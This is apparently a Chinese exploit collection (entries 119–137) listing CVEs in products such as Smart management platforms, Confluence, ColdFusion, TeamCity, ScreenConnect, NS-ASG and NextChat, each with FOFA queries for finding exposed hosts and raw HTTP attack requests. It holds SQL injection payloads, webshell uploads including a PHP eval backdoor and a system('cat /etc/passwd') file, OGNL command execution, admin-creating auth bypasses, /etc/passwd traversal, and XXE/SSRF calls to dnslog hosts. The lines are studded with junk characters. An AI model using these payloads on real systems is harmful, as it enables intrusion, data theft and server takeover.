119. 北京百绰智能S20后台sysmanageajax.php sql注入
: g+ _: l% E% ~/ u( ]2 _! u1 R  W6 ECVE-2024-1254
9 [  r  Q; F/ F, }5 VFOFA:title="Smart管理平台"
. W" w- d) `/ c( y  q* a+ j先登录进入系统,默认账号密码为admin/admin( `3 O5 Q+ J0 y, [  ^, c* T
POST /sysmanage/sysmanageajax.php HTTP/1.111 V" O* e+ A& M- |8 U6 R5 e- f
Host: x.x.x.x1 ^+ a( F1 @- u6 I  l
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
' l, d# {. |5 ?7 a6 l9 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
) ^- D$ q7 J/ }0 g' tAccept: */*3 i, N& A6 F9 \* E7 h7 W9 l8 ^( I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( s( F1 G; h. h8 cAccept-Encoding: gzip, deflate3 b( R7 U4 E- V( }! I+ b
Content-Type: application/x-www-form-urlencoded;# X1 K, S4 Z& O7 j+ i6 F
Content-Length: 109/ l$ S' w# `/ K( M! q1 ?8 Y3 y
Origin: https://58.18.133.60:8443( E3 x7 `0 \) S6 B$ P# x: E5 M  h9 F
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
( `8 ~; j/ @& d# _& cSec-Fetch-Dest: empty
% Q0 s2 d5 F6 V- J( sSec-Fetch-Mode: cors" J  q3 K6 R  I$ D5 C5 L) s' ~; M' P
Sec-Fetch-Site: same-origin
* b% R$ s; Y% M& M4 _X-Forwarded-For: 1.1.1.1
, u' O5 V- F9 ?X-Originating-Ip: 1.1.1.1& [! O2 I" ]9 ~) T9 E: j
X-Remote-Ip: 1.1.1.1: H2 D) D) }" a0 u& G1 A6 a' l: u
X-Remote-Addr: 1.1.1.1
6 j. R2 a: p/ i2 c  N  D1 p- eTe: trailers
& B, U' S$ l9 N6 vConnection: close
. q0 H( Z  [8 Q0 n# N& }
% k" p4 ~( i: \9 m6 Zsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234563 g3 v. k0 h+ c

5 J  k; F/ u! s: \* u' k+ h3 u6 Q% E( n1 A3 @
120. 北京百绰智能S40管理平台导入web.php任意文件上传
8 ?. M! p+ w# \3 V7 @: ZCVE-2024-1253! `& n9 D! }+ y: ^0 e
FOFA:title="Smart管理平台"6 q8 q$ q- K: d& V  |& d  r0 l
POST /useratte/web.php? HTTP/1.1
- d. f$ Z5 g4 Z' W& i& |' |8 ?Host: ip:port7 O: V8 Z0 I/ }1 D, y
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
# B  |+ l1 z. w9 H& Y: KUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
4 w1 Z" _- J, W) s' Z. I" H- s( wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 h2 [# F# |# t$ E7 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& \, J7 {1 C, E. k
Accept-Encoding: gzip, deflate7 v: c* U% H4 x0 N9 [
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328" w& d, f9 G. a: V+ [8 G
Content-Length: 597
# l. Y) a' X, T2 dOrigin: https://ip:port
# K: H6 I: g' o7 K) `5 `) b: T, sReferer: https://ip:port/sysmanage/licence.php
. ]  `9 m! V$ R" wUpgrade-Insecure-Requests: 19 s2 w# m& R. b* G: M, |$ N; B
Sec-Fetch-Dest: document
3 e3 K" Y7 W0 g, NSec-Fetch-Mode: navigate+ y2 ?8 g% n- d, d( r6 T9 }
Sec-Fetch-Site: same-origin
5 W6 \  p* d2 r+ ?% ySec-Fetch-User: ?1
0 }: P6 u, Y" w- \) eTe: trailers. {: e$ o, Y: t1 i8 ?- y& m
Connection: close4 \" w1 R* G0 n5 ]. |/ a) X

! Z- o& B  y# N-----------------------------42328904123665875270630079328
5 }0 [* D8 p& s) E' B/ TContent-Disposition: form-data; name="file_upload"; filename="2.php"
  h+ g! A% T1 l# x$ F6 ^- k; ~Content-Type: application/octet-stream! r: s" C. `5 R$ B

2 k7 {* Y! q3 d- Q2 d( C. ?( E<?php phpinfo()?>
* ~* @  {# y8 M-----------------------------423289041236658752706300793282 C; z- `' }: l8 o( C  i& J
Content-Disposition: form-data; name="id_type"8 X- h. O: A/ Q
; S% _- a7 R) [- B- e, W
1! K) v  ~& ^4 S+ }+ j3 Y! [# `
-----------------------------423289041236658752706300793289 c& q6 u8 u6 g3 {# [
Content-Disposition: form-data; name="1_ck"
! ?! X  z0 Y* g9 X% [1 N: h' i. G$ }/ m
1_radhttp$ p6 s9 n3 \# n4 q( |( M
-----------------------------42328904123665875270630079328
1 w: b$ H. W+ e% m8 ]Content-Disposition: form-data; name="mode"  f! ]) E9 t1 ?% c0 M8 r) ], R

9 V. {! F4 p- D. ^import
9 _8 L" \- w( |: x( A-----------------------------42328904123665875270630079328
, s4 d0 @/ d( A, x8 i- x7 j4 L7 w& ~) l% o( n6 V& A

7 D, E' l$ J: P4 M6 v文件路径/upload/2.php
' l2 B& V9 m, x# g' ~& \/ L5 P# ^
2 x! h4 V3 Z% H121. 北京百绰智能S42管理平台userattestation.php任意文件上传7 t6 k7 e; {( }2 K8 U  @" ^
CVE-2024-1918  B+ }- F- G  ]" c9 O! p' z
FOFA:title="Smart管理平台", c- S0 p/ i$ k! F
POST /useratte/userattestation.php HTTP/1.12 v& n" h  J8 A( m+ C# A- _
Host: 192.168.40.130:84435 R8 M5 y* `; N# l
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
, s! [  i* R- F6 S1 E' ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko$ ]9 p# _# Z- J; n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 \" v" Q) o) S- g3 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ A% W7 _5 a' [! x- _
Accept-Encoding: gzip, deflate
5 o  B" q6 S$ h6 c) z# TContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
' \) h% M: t& B5 ~1 e5 `) I. ZContent-Length: 5924 U- \0 d3 K, \6 F! U
Origin: https://192.168.40.130:84431 q9 q" |) ~' b9 x5 x8 {3 k+ R
Upgrade-Insecure-Requests: 19 D/ b6 _. \  ?$ W
Sec-Fetch-Dest: document
4 _6 c2 I  |) p! USec-Fetch-Mode: navigate
# n  G- U6 v, V, b8 O# gSec-Fetch-Site: same-origin% x6 e: o5 U8 L* w6 M
Sec-Fetch-User: ?1. G; D! t% x3 I" J/ S" r* t+ B
Te: trailers
3 ]$ x7 g4 E& L: NConnection: close
$ ~5 `: F- P+ B% g- Z2 k# u& t( J' r( d! K5 W
-----------------------------42328904123665875270630079328: G2 h! |- A) P
Content-Disposition: form-data; name="web_img"; filename="1.php"
( j6 r3 [5 O1 J: ]8 o( m7 s* q; y" n; vContent-Type: application/octet-stream
9 X( X4 z/ H8 b  q1 v
+ `% z. _& G7 t9 Q1 Q<?php phpinfo();?>9 Q0 e9 g" s' n1 W9 `2 X( r) X
-----------------------------42328904123665875270630079328
4 r7 B" O+ _' k6 j2 t7 _Content-Disposition: form-data; name="id_type"4 e& U' T3 p% e/ F- }$ T( m
; e8 H' ^: i/ S+ f' a
1+ o3 p# f2 u6 ?
-----------------------------42328904123665875270630079328
( o2 U0 `5 n: G+ s8 D* aContent-Disposition: form-data; name="1_ck"
& G8 i/ d, |) x( {: V( k- V! M/ m
1_radhttp
" L: y4 D& }( D3 c4 A! {-----------------------------42328904123665875270630079328
0 c& w* a& X! r( s3 n5 f- C. kContent-Disposition: form-data; name="hidwel"
+ x: U7 V  N2 x- c; ^/ f/ M* Z5 G! o: b! u5 }; P
set
3 m+ y, w  k: c$ _-----------------------------42328904123665875270630079328
( F. L1 R  {& b1 X- P9 v8 ~6 @& O) Q
/ z5 t3 N0 a1 m
boot/web/upload/weblogo/1.php
' u( _7 j! z( T- K, }3 D0 `1 b0 T! ]) E# {6 t6 D( b
122. 北京百绰智能s200管理平台/importexport.php sql注入% v2 @( L5 t' x( B3 S8 f, ~
CVE-2024-27718FOFA:title="Smart管理平台"
8 W! h: H8 Z' a- Q3 y  L其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()" z; ]! Y5 G- F: o# _
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
& ]: o! B  P0 _$ \Host: x.x.x.x# n# d! R0 v! i
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
0 J( v8 d: J2 r* Y+ C( G  c- XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# p+ p/ [8 b/ K  l* N; W8 t* }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) v1 e6 y2 L0 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 Y( ?2 P1 C3 P! v
Accept-Encoding: gzip, deflate, br8 |+ O5 p0 H3 i" U
Upgrade-Insecure-Requests: 1
% Q/ R' e( y: \2 t: b$ s% oSec-Fetch-Dest: document, Y! ~3 S/ ]% `/ d
Sec-Fetch-Mode: navigate
* t2 {( b( g+ I7 p, QSec-Fetch-Site: none* x3 `* T& a, c
Sec-Fetch-User: ?1
. l- j7 n% b* q  i9 QTe: trailers. v/ f( c- k" j- M2 G
Connection: close
( b/ |% i% a. x+ ^8 n+ @8 h  |: e
: {- [$ I: o: z8 p' X  E  I/ W
123. Atlassian Confluence 模板注入代码执行2 P. u. k$ r6 c$ q- A+ W2 c1 G
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"' i# E0 y" F6 Q$ ^8 x
POST /template/aui/text-inline.vm HTTP/1.1
; E  k5 s2 K2 q. PHost: localhost:8090
* C) W& `! `/ J: M! R) VAccept-Encoding: gzip, deflate, br
% ~* a4 _" {: Y' xAccept: */*% s: d4 u; K  R7 {0 m0 ?6 }, X
Accept-Language: en-US;q=0.9,en;q=0.8' F) y' m* g9 I) U1 n4 W# h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36. |3 h+ b7 J( |4 u6 x1 l
Connection: close2 m1 a: o0 I% H: r3 a
Content-Type: application/x-www-form-urlencoded
8 k* [' b* d: p2 m+ a( j; V; z; b" g; M" O
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
  F- ?( m) g; p% L
1 G" _* m* n4 ]: b/ r! S1 f( g$ k$ {9 x# R. K2 n6 |+ w  J. w
124. 湖南建研工程质量检测系统任意文件上传
6 q6 q+ |2 F' \- b; ]* H8 E$ U3 sFOFA:body="/Content/Theme/Standard/webSite/login.css"
- X/ K- H; ~$ I; j: cPOST /Scripts/admintool?type=updatefile HTTP/1.1
+ l) ]/ C& n# i9 d& i) K: Q7 \Host: 192.168.40.130:8282, A, U) ^& l6 B" g. L* B
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% o* S2 N' ]3 C. {# k  y! |
Content-Length: 72  D: W, M8 s% `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8/ F: {9 L+ O4 w& b2 Q- u* W
Accept-Encoding: gzip, deflate, br! h( Y# L$ @5 E, y& r, J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 v2 z6 g" r  I* G
Connection: close
% e- k% F1 q$ T7 @# }9 G( MContent-Type: application/x-www-form-urlencoded: L2 Q' Y5 @1 l, Q6 I5 S

9 T8 X1 P0 ?9 k# [$ ]filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
$ Y, N! l( Y1 V8 n% m  U
- b6 {3 w- h+ |
7 w0 S7 E1 K. V5 Ihttp://192.168.40.130:8282/Scripts/abcgcg.aspx
- C. c: ?/ @0 j' C* t! K
( a9 c4 l+ n7 F9 \/ u' }+ n$ @& r: \125. ConnectWise ScreenConnect身份验证绕过" t& G5 R: ]1 ^; Q! W0 Q+ u! ?3 d
CVE-2024-1709+ T, a# K1 B1 f1 i
FOFA:icon_hash="-82958153"' K9 y# D) w! V/ i2 x8 w2 ~4 \
https://github.com/watchtowrlabs ... bypass-add-user-poc! {# D" T% G# U  S9 Z
7 B7 U9 G$ _5 z' B! k5 r* K
+ u; E1 @9 G+ {
使用方法
- f: Z" n3 ?$ q3 D" gpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
( O" m5 R; t' A' y9 c% [& G6 J5 A( T: Y- M
* |: `$ n3 Q/ b- v
创建好用户后直接登录后台,可以执行系统命令。5 H- V& U7 F$ p5 D; U- R5 v; z0 J
' h* C' w. j1 E/ E$ {! c
126. Aiohttp 路径遍历7 S* r, Q) [5 K$ n; B; E% G) N
FOFA:title=="ComfyUI"( y9 N0 _4 Z9 S  _  [
GET /static/../../../../../etc/passwd HTTP/1.1. r, G9 M! [8 Z+ n- _
Host: x.x.x.x5 ^, [8 ~/ z/ a" @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 K* P" ~; _3 y' V
Connection: close
# i$ r' R( z: Q4 U* i- [9 B2 OAccept: */*
) {& g4 D! {. SAccept-Language: en
( k3 B) q7 j; `8 W. v+ P4 FAccept-Encoding: gzip
4 p" h. G- u( R8 A. T* r9 q$ s  L
% W$ i* p6 i6 B$ M9 E- K  b. K: A" {+ o
127. 广联达Linkworks DataExchange.ashx XXE$ ~9 ~5 ^, ]6 h; U
FOFA:body="Services/Identification/login.ashx" 4 r+ d# z) a$ C/ Z  V9 Y
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
: N" F8 }, B1 h9 t5 \0 ~Host: 192.168.40.130:8888, Z% c# y4 W, U7 a0 b) U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
, q3 H- I4 m1 D; t7 {0 }Content-Length: 415; }% ]/ ]0 x$ J9 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( e5 d# A2 l8 f; q! n4 ZAccept-Encoding: gzip, deflate
9 D5 ?  ~, \7 ^/ _/ l. g" J3 l# AAccept-Language: zh-CN,zh;q=0.9  {# K% f+ }" R& _7 X  G+ m
Connection: close0 Z" C( @5 u! j
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe02 r2 M1 t8 |7 v6 t: D
Purpose: prefetch2 S+ f* H5 Y8 e; p; h
Sec-Purpose: prefetch;prerender
! S+ G2 ?, T; e) z7 @1 z5 B& T8 I. K  p1 w- V6 k  \1 S
------WebKitFormBoundaryJGgV5l5ta05yAIe0. A2 P( F* m! r0 E& _
Content-Disposition: form-data;name="SystemName"
2 Z& s  G* {) o3 w2 E
6 p: V; X0 o& e. vBIM
# Q, X( o, S' q% p------WebKitFormBoundaryJGgV5l5ta05yAIe0+ W6 Z( G9 L* H7 M
Content-Disposition: form-data;name="Params"
1 |: E3 ~* [: M/ O% d  TContent-Type: text/plain: Q9 Y, Q; {5 o8 [; H5 t9 y

- J2 T% J* J1 T. C, [<?xml version="1.0" encoding="UTF-8"?>
$ f  B3 g" H' F* v<!DOCTYPE test [
: X4 J* y- u9 E* i: b* Q* D8 Q+ R<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">4 I7 j' i4 I" z) k
]4 j. O" C, u9 y- q1 b
>
3 S) q  g7 @% p8 D+ T; |" R<test>&t;</test>
4 O4 q, E: `% a  S* L5 |------WebKitFormBoundaryJGgV5l5ta05yAIe0--
/ W& J0 {0 t0 f* Y7 T+ x
+ e; ~: D% B( \7 B7 m+ @( R3 y! p0 ]2 P5 s
8 A% ]+ C% u4 ]; R) s
128. Adobe ColdFusion 反序列化
/ \$ p! q' T8 U( ?& o" uCVE-2023-38203
% e, m6 T. {& u9 YAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
+ @7 T) `- N' y+ [1 u" o1 o- jFOFA:app="Adobe-ColdFusion": B5 R4 B; x* j: b
PAYLOAD
9 L! w/ s* m( k1 j2 P/ _
6 i) R$ P/ \; ~9 e$ A; N! B129. Adobe ColdFusion 任意文件读取4 o$ p0 _3 R1 J8 B% J9 ^
CVE-2024-20767+ H# C" o0 w$ V7 F8 z
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
/ x& y0 F% {+ [第一步,获取uuid
$ M* f" b# ^: w" y/ W+ G, h9 dGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.12 ]1 p* I9 S8 u3 \
Host: x.x.x.x
" S, j3 S) }% D* f  aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
4 P* t6 h2 q& I3 R1 x0 b$ ~Accept: */*
7 I$ F/ H1 _3 U/ K! wAccept-Encoding: gzip, deflate5 {7 v) Q% n7 X; v; |# a
Connection: close
- E; P- d% O! s* |8 P' T. k$ h- V% m) R8 s# O  t
% z( A0 G3 s: M" W' v" i" a  [4 f, h
第二步,读取/etc/passwd文件
- Q: ~& N. j. b5 l0 SGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
7 h0 K& H/ B' E+ ], lHost: x.x.x.x
4 ^5 \3 a+ _, j# h0 W) bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) B) s; _( B3 @% e9 f  {0 SAccept: */*
3 o2 F9 j, k' f+ {2 RAccept-Encoding: gzip, deflate
8 P# |/ Z, u/ {+ k2 y& mConnection: close
( k& l6 o2 r/ F& y; ~uuid: 85f60018-a654-4410-a783-f81cbd5000b9
- l* r, o1 _$ H5 R9 A6 I5 Z
( L* v' h- x. O8 h  ]* e6 @1 g" k/ G, [6 ~0 [! w  e$ A; S
130. Laykefu客服系统任意文件上传
% r) N! v2 w4 b0 FFOFA:icon_hash="-334624619"( l) y7 x6 y" @9 U# L
POST /admin/users/upavatar.html HTTP/1.1! C/ h5 N: F- ?6 v  N/ S* Q' w3 c
Host: 127.0.0.1; w5 q4 k- F6 e
Accept: application/json, text/javascript, */*; q=0.01
0 U: o$ [4 S6 o9 U3 W1 uX-Requested-With: XMLHttpRequest1 g) U8 \3 w* L2 [0 z
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.264 F; p& c. t( D  ], y; d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR1 y& w9 x$ ^# C3 q: f
Accept-Encoding: gzip, deflate
$ L# [. Z- H. K$ L3 n' ?- FAccept-Language: zh-CN,zh;q=0.95 |" }1 D# }. d8 o. F
Cookie: user_name=1; user_id=38 ]# {! }- P, a4 u4 I# J
Connection: close
5 C( F, q& L* i( k2 C5 o% C% M2 R; @; h( i& j  n* w
------WebKitFormBoundary3OCVBiwBVsNuB2kR
* A( t0 j* C8 N7 z* eContent-Disposition: form-data; name="file"; filename="1.php"& ^8 \' n/ L3 ]: b
Content-Type: image/png
+ }* c$ O- {8 F) H, N- m( d
( F$ m7 e7 V0 b$ t: `" q/ `7 B- }<?php phpinfo();@eval($_POST['sec']);?>
4 w; O% J# T8 W7 o- k5 N. r------WebKitFormBoundary3OCVBiwBVsNuB2kR--
8 h4 m6 Q1 ]; q  F5 S+ t) z+ ~! j4 Z- J6 J; K  n
0 o! ]  L& ?4 g; s( u' |% o) R
131. Mini-Tmall <=20231017 SQL注入! T, l5 _5 s; n& S
FOFA:icon_hash="-2087517259"3 M8 j- V: e- p/ v( k
后台地址:http://localhost:8080/tmall/admin
! f7 z$ z1 N/ H% @5 N" z. X/ x0 mhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
- N# c0 J$ T0 ^6 f9 m% {5 K5 l( j( B4 x& [1 w3 ]0 t
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
: ~& d7 S, B& E2 p2 [) ^3 I" nCVE-2024-27198
) G0 f3 t8 ~2 hFOFA:body="Log in to TeamCity"
% \% S1 b; H1 G; b1 S5 d+ T: c& jPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
# O7 t0 g( g% z. ^9 H9 Y; MHost: 192.168.40.130:8111" {: j) m; |, t2 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" b5 I+ j3 z( [; e% NAccept: */*
5 Y  L4 C! i  I" R! P  _/ nContent-Type: application/json" B4 }8 t0 V$ B9 G5 L( c
Accept-Encoding: gzip, deflate
8 v9 O, P, c2 E: X8 @: U/ N
" U3 S: V( _9 v# K{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}8 Q% j1 ^) @9 V* |- i
# B3 Y8 L9 H6 y3 e8 n# H

" _* S% c4 D0 K" F& U! z2 C  ~CVE-2024-27199
! i6 J3 K. Y; @* v# P/res/../admin/diagnostic.jsp" k. |4 @1 T& @9 I0 h
/.well-known/acme-challenge/../../admin/diagnostic.jsp
6 ^% L8 [* c; ?& r. f/update/../admin/diagnostic.jsp' t9 {- y- H. R/ E2 V9 H' @  `% _( o0 p

) G4 J* {6 @/ M: s* K3 K6 q! @! l1 O3 o( k
CVE-2024-27198-RCE.py
) M! |, x  q/ Z. {4 U9 V! b3 f0 h9 \% X/ C1 @
133. H5 云商城 file.php 文件上传' b$ x1 ~7 M' V5 p) W5 L: p' A
FOFA:body="/public/qbsp.php"
2 X( Y$ C" b6 v' T# k# nPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1, m* {6 S7 f% V2 V. A
Host: your-ip
8 C; |- @# k3 E3 w+ p2 M+ TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36  Z9 b! X6 u# I3 h7 o, ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
8 ?1 M, \+ E+ c9 T+ J+ }; G  ~6 X- a9 c" ]4 Q) H0 r# A
------WebKitFormBoundaryFQqYtrIWb8iBxUCx- t: d( G" m8 G6 N
Content-Disposition: form-data; name="file"; filename="rce.php"
1 q: a( k1 V5 B% d2 W$ R- tContent-Type: application/octet-stream6 u$ ~0 N4 F0 @

. d4 ]3 ^& U1 w<?php system("cat /etc/passwd");unlink(__FILE__);?>
% V! k+ N  u- Z0 Z------WebKitFormBoundaryFQqYtrIWb8iBxUCx--7 D8 y- l9 Z2 e. ~' G( P; M' b
7 [+ F+ f# E& E: g+ E" N) B3 @

, ^. o1 j: z% j( C: R* J
& _, v6 H0 p5 h& s, M6 L1 w4 X134. 网康NS-ASG应用安全网关index.php sql注入
+ I* p6 M3 D4 G% n- YCVE-2024-2330  A: s+ d& c" e! g+ G: c/ M4 R
Netentsec NS-ASG Application Security Gateway 6.3版本
! ~; F& o! D+ t6 h2 F1 TFOFA:app="网康科技-NS-ASG安全网关"
6 O1 F9 p! f& }- Z+ pPOST /protocol/index.php HTTP/1.1
. l0 }/ y( C& f' i8 c) K$ s1 jHost: x.x.x.x$ b# M% |, ~$ \/ u- h3 h
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
; U  c- h1 a( E* }6 P2 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
- N0 A: Y3 }9 N  _: CAccept: */*7 U$ _- D' p( M" z; ]8 A9 R# T& f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( c* h, K1 @+ k( l. O* iAccept-Encoding: gzip, deflate
: J0 I. K: Q" R+ RSec-Fetch-Dest: empty
- G, {% p# N/ b% T6 OSec-Fetch-Mode: cors
4 D: s# @1 H3 x% p8 t% U1 M3 b0 {! `Sec-Fetch-Site: same-origin- e- F4 c; B. Y
Te: trailers
" |* b6 ]7 K/ j( W5 o0 E+ DConnection: close
7 F0 B9 M) |. J8 ~  y% C! E1 x9 JContent-Type: application/x-www-form-urlencoded# Y, O6 A. Z% U. O' O
Content-Length: 263
( Y& Q3 j1 |, ?! b0 J6 a- E
3 _6 }% I. H7 J5 t0 h$ e2 ujsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
" D0 w# `( C+ R8 W, a" ?) G& M  l  @  D
  a; F# M+ U* r6 O9 e
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入. R2 a0 q' G9 q( w/ w8 x5 [
CVE-2024-20222 N7 G" d4 k2 L0 |7 K% r) }0 y, p$ Q
Netentsec NS-ASG Application Security Gateway 6.3版本9 j: J# Z; F/ l, s0 S! v
FOFA:app="网康科技-NS-ASG安全网关"
- Q9 ^/ x1 `; z$ j% jGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.11 i: X+ j# I1 c# b# E
Host: x.x.x.x. o5 ?( @8 R. ]2 X" x' \$ i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' A! R7 E* l7 C# e+ lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ c6 X. N8 o0 y" EAccept-Encoding: gzip, deflate( c3 {8 d5 G: Y0 N
Accept-Language: zh-CN,zh;q=0.9% H) w# o' H8 t5 A! k- R
Connection: close
- Z& {( ]* d0 `7 P
  @/ l, x9 i5 A9 P
/ q2 ~) y! t& ], C" \) b& w2 K136. NextChat cors SSRF, |, w2 h" b( Q/ o8 t/ |( V+ ^
CVE-2023-49785/ v# G: {$ A' l# `; J. r
FOFA:title="NextChat", u) ?. ], S  g& }+ v2 n
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
5 C. W$ Y* C- _$ P. zHost: x.x.x.x:100002 r6 |# O8 C4 L
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) z  e7 @' _+ U( H+ u0 `" e, HConnection: close7 x( J% b5 L4 w
Accept: */*
3 }: T, p5 ?. @Accept-Language: en; X: L% J0 o) z2 @
Accept-Encoding: gzip
8 Y5 P0 D. `5 [9 Y, J6 E, l  B* h4 k

9 N$ {2 y" P, `& p' \0 Y. X. R137. 福建科立迅通信指挥调度平台down_file.php sql注入- C! A" \( B* [
CVE-2024-2620
4 `0 C: H" z$ Y- o& K6 qFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"; E, K" f5 Z8 j
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1# Y( C# v7 F# ]$ G0 g
Host: x.x.x.x
9 ~) E8 j- _/ R: T9 u- FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 H: ]8 \' c* [; `- Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# r% S! d) D% w' t  ^/ Q/ X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 J. Y* S2 N. p
Accept-Encoding: gzip, deflate, br
* p7 z2 o9 j6 B) X7 Z: ?Connection: close
4 C8 q. y# u2 e4 s( G/ H1 R2 K* tCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
